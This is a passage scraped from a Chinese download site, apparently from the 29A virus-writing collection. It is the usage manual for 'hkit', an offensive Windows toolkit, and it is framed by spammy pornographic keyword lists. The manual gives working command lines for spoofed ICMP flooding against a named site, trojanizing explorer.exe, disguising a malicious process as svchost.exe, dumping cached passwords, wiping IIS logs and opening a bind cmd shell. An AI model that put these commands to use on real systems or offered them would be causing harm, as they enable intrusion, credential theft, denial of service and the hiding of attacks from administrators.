亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.006

?? 從29A上收集的病毒源碼
?? 006
?? 第 1 頁 / 共 2 頁
字號:
  the service.
  Use "hkit /service /boottype ServiceName /auto|demand|boot|system|disabled"
  to change service boot type.

  3. Packet-related (crcpkt & spoofer)

  Use "hkit /crcpkt packetfile" to recalculate IP/ICMP/UDP/TCP csum(s) of
  the specified file, containing IP packet.
  Use "hkit /spoofer packetfile [ntimes|0=infinite] [dst_ip]" to send that
  packetfile to some IP.
  If <dst_ip> is not specified, address is taken from
  the IP_header.Dst_IP field.

  4. Sniffer

  Use "hkit /sniffer outfile|basepath|NULL [option(s)]" to invoke
  the raw-socket sniffer.

  If "NULL" is specified as an output file name, no output file(s)
  are generated.
  If "/1" is specified within options, single file is written.
  Otherwise directory with some sub-directories are created,
  containing many files inside.

  You can specify "/input=<infile>" to tell sniffer that input packets
  should be taken from file, not from network.
  This can be previously sniffed file, or SNORT'ed file (then use "/insnort").
  Broken snort'ed files are repaired.

  If "/1" is NOT specified, you can use "/r" to write tcp sessions
  as a single files, instead of writing multiple files per each packet.
  Also here "/s" can be specified, to skip IP header's.
  Each TCP session is written as two files: input and output data.

  When processing (reading/writing) files,
  use "/rt", "/wt", "/rl", "/wl" to read/write packet Timestamp and/or Length.
  NOTE: if you have specified "/wt" and/or "/wl" when sniffing,
  you should specify the same "/rt" and/or "/rl" combination
  when reading corresponding file.

  Use "/tcp|udp|icmp+|-" to include/exclude protocols.
  For example, "/tcp-" will exclude tcp from being sniffed,
  while using "/udp+ /icmp+" will sniff ONLY udp and icmp.

  Use "/ip+|-<ip_mask>" to specify IP mask to be sniffed.
  For example, "/ip-192.168.*.*" will exclude lan from being sniffed,
  while "/ip+123.*.*.*" will sniff ONLY the specified range.
  Up to 1024 IP masks/addresses can be specified.

  Use "/v" to verbosely dump sniffed packets (line per packet).
  Use "/ip=<ip>,alias" to rename IP within dump.
  4ex: "/ip=192.168.0.1,gateway"

  Use "/http" and/or "/dns" to dump http/dns requests/reply details.
  Use "/log=logfile" to write dump into log file.
  Use "/f" to flush files after each write operation.

  Options can be also specified in the following locations:
  - current_directory\hkit.cfg
  - path:\<argv0>.cfg
  - command line

  To sniff & see packet info in the console:
  "hkit /sniffer null /v /http /dns"
  To sniff into single file, use:
  "hkit /sniffer sniffed.bin /1 /wl /wt"
  To re-process sniffed file, use:
  "hkit /sniffer /input=sniffed.bin /rl /rt sniffed2.bin /v"
  To sniff in 1packet-->1file mode, use:
  "hkit /sniffer sniffed /v"
  To sniff in 1packet-->1file mode, but merge tcp sessions:
  "hkit /sniffer sniffed /v /r /s"

  5. ICMP Pinger/Scanner/Spoofer/Flooder

  Use "hkit /ping <ip|host> -n count" to ping host count times.
  Specified IP is a destination IP written into sending packet.
  Use "-pktsrc addr" to specify source IP written into packet.
  Use "-intsrc addr" to specify source interface IP.
  Use "-intdst addr" to specify destination interface IP.
  Use "-l size" to specify ping's payload size.
  Use "-nw" to force flood mode -- i.e. dont wait for replies.
  Use "-w timeout" to specify pong wait timeout, in milliseconds.
  Use "-scan -n count" to scan count hosts, starting from specified IP.
  Use "-fastscan" instead of "-scan" to use parallel scanner
  (two threads - sending and receiving).

  Pinger: "hkit /ping www.microsoft.com"
  Scanner: "hkit /ping www.microsoft.com -fastscan -n 256 -w 10000"
  Spoofer/Flooder: "hkit /ping www.microsoft.com -pktsrc fuck.org -nw -n 0"

  6. Registry

  Use "hkit /reg /dumpall" to save all accessible data into
  regedit-compatible file.
  Use "hkit /reg keyword(s)" to search for at least one keyword
  within each processed key/value/data set.
  Use "hkit /reg /all keyword(s)" to search for ALL keywords
  within each processed key/value/data set.

  Options:

  Use "/key-", "/data-", "/value-" to disable searching within key/data/value.
  Use "/c" to enable case-sensitive search.
  Use "/findascii" to search ONLY within ascii data format.
  Use "/findunicode" to search ONLY within unicode data format.
  Use "/outfile=filename" to change output file from hkit.reg to filename.
  Use "/outunicode" to force REGEDIT5-compatible output format.
  (default is asciim, REGEDIT4-compatible)
  Use "/text-" to disable ascii commentaries corresponding to hex data dump.
  Use "/fillout" to fill output data with X'es or 0's.
  This is useful to wipe specified registry keys.

  Example: "hkit /reg /outfile=con icq"

  7. Disassembler/trojanizer (previously REVERT tool, MISTFALL-based)

  Use "hkit /revert explorer.exe explorer2.exe --mode=virus:abc
      --virus-va:00401234"
  example says: disassemble explorer.exe, insert binary file 'abc'
  at address 401234, and link it all into new file explorer2.exe.

  8. Binary --> source/echo conversion

  Use "hkit /bin2src /asm|pas|cpp 123.bin" to produce 123.inc containing
  "DB 55,66,77,..."-like commands.
  Use "hkit /bin2src /bin|asm|pas|cpp 123.bin /S=$START$ /E=$END$ @txt"
  to search for '$START$'/'$END$' signatures within 123.bin,
  and write everything between them as an array named 'txt'
  into 123.bin|ash|inc|cpp-file.

  Use "hkit /bin2bat somefile.exe batfile.bat targetfile.exe"
  to produce batfile.bat from somefile.exe,
  which, when executed, constructs targetfile.exe.
  Source file will be split into 64k-blocks, each of them will be
  packed and converted into self-extracting ascii .com-file.
  Resulting .bat file will ECHO and RUN these .com-files,
  and then append resulting 64k-blocks to targetfile.exe using 'copy /b'.

  9. FakeExec

  This is new (and EXPERIMENTAL !!!) technology allowing you
  to fake [existing] process' file name or pid.

  As a result, ntquerysysteminformation (taskmgr) & psapi (module list)
  returns something like svchost.exe, while real executed process were
  kind of trojan.exe.

  It is very complex stuff, which consists of patching PEB
  in the corresponding process' context, and patching system structures
  through PhysicalMemory device, and except that, ring0 entering were used,
  and this all were complicated by internal structures mismatch
  in the 2K/XP systems.
  So you should understand, that in some cases it doesnt work,
  and in other cases it can crash system ;-)

  It should be executed as the following:

  "hkit /fakeexec notepad.exe calc.exe" -- exec notepad and change name to calc
  "hkit /fakeexec bsodomon.exe 31337"   -- exec process and change pid to 31337
  "hkit /fakeexec 666 31337"  -- find process with pid=666 and set pid to 31337
  "hkit /fakeexec 666 svchost.exe" -- find process with pid=666 and change name

  WARNING!
  When process's pid is changed, on that process exit system will
  (in most cases) do BSOD.

  10. API<-->CRC conversion

  Use "hkit /crc /dll2crc kernel32.dll" to dump crc for each exported api.
  Use "hkit /crc /dll2api kernel32.dll View" to find all exported functions
  containing word "View" and corresponding crcs.
  Use "hkit /crc /api2crc CreateFileA" to calculate crc32 for "CreateFileA".
  Use "hkit /crc /crc2api kernel32.dll A89B382F" to find exported function with
  specified crc32.

  11. Other shit

  Use "hkit /showpass" to show cached password on NT/2K systems,
  (used PasswordReminder sources)
  Use "hkit /md5 file" to calculate file's md5 checksum.
  NOTE: file is threated as BINARY, not an ASCII file.
  Use 'hkit /md5 "phrase"' to calculate phrase's md5 checksum.
  Use "hkit /http ip port 10 20 req" to send file req to ip:port,
  and then dump reply; waiting 10 seconds for connect(),
  and 20 seconds for recv().
  Use "hkit /iislog" to clean IIS logs, even if IIS is running now.
  Use "hkit /savehkcu hkcu.reg" to save HKEY_CURRENT_USER into hkcu.reg file in
  binary form.
  Use "hkit /error 187" to show error code's description.
  Use "hkit /nterror c0000001" to show nt error's description.
  Use "hkit /telnetd ip port" to listen on ip:port for incoming connections,
  giving cmd shell. If ip is 0, listens on all addresses.

                                      * * *

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美经典一区二区三区| 久久国产三级精品| 精品国产乱子伦一区| 欧美日本在线视频| 欧美日韩一区中文字幕| 欧美日韩精品福利| 欧美一区二区三区免费大片| 欧美色区777第一页| 欧美精品丝袜久久久中文字幕| 在线观看三级视频欧美| 欧美三级韩国三级日本三斤 | 精品一区二区在线看| 日本不卡视频一二三区| 久久99久久99| 国产精品一色哟哟哟| 成人高清免费观看| 日本乱码高清不卡字幕| 欧美日韩国产高清一区二区三区 | 国产精品亚洲视频| 粉嫩av亚洲一区二区图片| 99精品视频在线观看| 欧美影院一区二区三区| 日韩午夜激情视频| 亚洲国产成人一区二区三区| 一区二区三区中文字幕精品精品 | av一区二区三区四区| 欧美在线观看视频一区二区三区| 欧美日韩国产美女| 久久久噜噜噜久久中文字幕色伊伊 | 国产欧美日韩另类视频免费观看| 国产精品网曝门| 亚洲地区一二三色| 韩国一区二区三区| 91免费精品国自产拍在线不卡 | 26uuu色噜噜精品一区二区| 国产精品乱人伦中文| 午夜精品久久久久久久99樱桃| 久久精品99国产精品日本| 一本大道av一区二区在线播放| 欧美一级理论片| 亚洲综合激情另类小说区| 国产酒店精品激情| 欧美日本精品一区二区三区| 国产欧美在线观看一区| 婷婷亚洲久悠悠色悠在线播放 | 天涯成人国产亚洲精品一区av| 国产在线视视频有精品| 欧美电影一区二区| 中文字幕一区二区三区蜜月| 国产综合色精品一区二区三区| 欧美午夜片在线看| 国产精品成人一区二区三区夜夜夜| 天堂资源在线中文精品| av电影在线观看完整版一区二区| 欧美精品亚洲二区| 亚洲综合自拍偷拍| 成a人片国产精品| 久久久99精品久久| 国内精品国产成人国产三级粉色| 精品污污网站免费看| 亚洲日本成人在线观看| 成人综合婷婷国产精品久久| 精品精品国产高清a毛片牛牛| 天天综合网 天天综合色| 欧美天堂一区二区三区| 最新高清无码专区| 99视频一区二区| 中文字幕亚洲一区二区av在线 | 亚洲一区在线视频观看| 96av麻豆蜜桃一区二区| 国产三级精品三级| 国产福利精品一区二区| 精品国产免费一区二区三区香蕉 | 久久天天做天天爱综合色| 免费成人深夜小野草| 日韩欧美高清一区| 蜜臀久久99精品久久久久宅男| 欧美精品国产精品| 日本不卡的三区四区五区| 日韩一区二区中文字幕| 美女视频黄 久久| 精品捆绑美女sm三区| 国产一区二区女| 国产亚洲精品中文字幕| 波多野结衣91| 亚洲免费伊人电影| 欧洲亚洲国产日韩| 日本不卡的三区四区五区| 亚洲精品在线三区| 成人精品一区二区三区四区 | 99视频在线精品| 亚洲午夜精品17c| 日韩一区二区中文字幕| 国产成人啪免费观看软件| 亚洲同性同志一二三专区| 色国产精品一区在线观看| 亚洲国产视频直播| 精品成人a区在线观看| 国产精品 欧美精品| 一区二区三区在线免费播放| 91精选在线观看| 国产精品亚洲第一区在线暖暖韩国| 中文字幕二三区不卡| 欧美日韩一区二区三区在线| 麻豆一区二区99久久久久| 久久精品视频免费| 欧美日韩久久久一区| 精品一区二区三区免费| 一区二区三区中文字幕| 日韩久久久久久| 色综合久久中文综合久久牛| 免费欧美日韩国产三级电影| 国产欧美精品一区aⅴ影院 | 欧美国产禁国产网站cc| 欧美丝袜丝交足nylons| 国产激情视频一区二区在线观看| 亚洲一区在线观看网站| 2020日本不卡一区二区视频| 欧美中文字幕不卡| 国产一区二区不卡在线| 视频一区二区三区中文字幕| 欧美韩国日本不卡| 日韩欧美在线观看一区二区三区| 一本久久a久久精品亚洲| 久久99精品久久久久久国产越南 | 国产黑丝在线一区二区三区| 亚洲大片在线观看| 亚洲日本青草视频在线怡红院 | 欧美专区日韩专区| 成人午夜av电影| 久草精品在线观看| 天天色 色综合| 亚洲国产一区二区在线播放| 一区精品在线播放| 久久一留热品黄| 欧美一区二区三区播放老司机| 色综合中文字幕国产| 精品写真视频在线观看| 亚洲欧洲另类国产综合| 久久亚洲一级片| 日韩免费电影一区| 91精品国产欧美日韩| 欧美性一级生活| 欧美自拍偷拍午夜视频| 色视频欧美一区二区三区| 国产不卡在线一区| 国产不卡在线视频| 国产精品一区二区在线观看不卡| 日本成人中文字幕| 日本一不卡视频| 蜜桃视频在线观看一区二区| 亚洲一二三区视频在线观看| 亚洲在线视频一区| 亚洲午夜电影在线| 天天综合网天天综合色| 日韩av中文字幕一区二区三区| 亚洲r级在线视频| 日韩高清不卡一区二区三区| 青青草国产成人99久久| 狠狠色综合播放一区二区| 九九**精品视频免费播放| 国产成人精品午夜视频免费 | 亚洲精品伦理在线| 一区二区三区在线免费观看| 亚洲欧美经典视频| 一区二区视频免费在线观看| 亚洲国产综合在线| 奇米888四色在线精品| 极品少妇一区二区三区精品视频| 国产一本一道久久香蕉| 成人免费视频视频| 91黄色免费看| 777亚洲妇女| 久久久蜜桃精品| 一区二区三区日韩| 日韩精品国产精品| 国产精品自在欧美一区| 91麻豆swag| 日韩色在线观看| 国产精品久久毛片a| 亚洲精品中文字幕乱码三区| 日韩制服丝袜av| 国产呦精品一区二区三区网站| 91麻豆福利精品推荐| 日韩欧美综合在线| 成人欧美一区二区三区| 日本va欧美va精品发布| 风流少妇一区二区| 精品视频一区三区九区| 国产欧美日韩三区| 日韩中文字幕区一区有砖一区 | 欧洲生活片亚洲生活在线观看| 这里只有精品电影| 中文字幕欧美区| 热久久久久久久| 色88888久久久久久影院按摩| 精品入口麻豆88视频| 亚洲免费观看在线视频| 国产一区二区三区电影在线观看| 欧美日韩在线免费视频|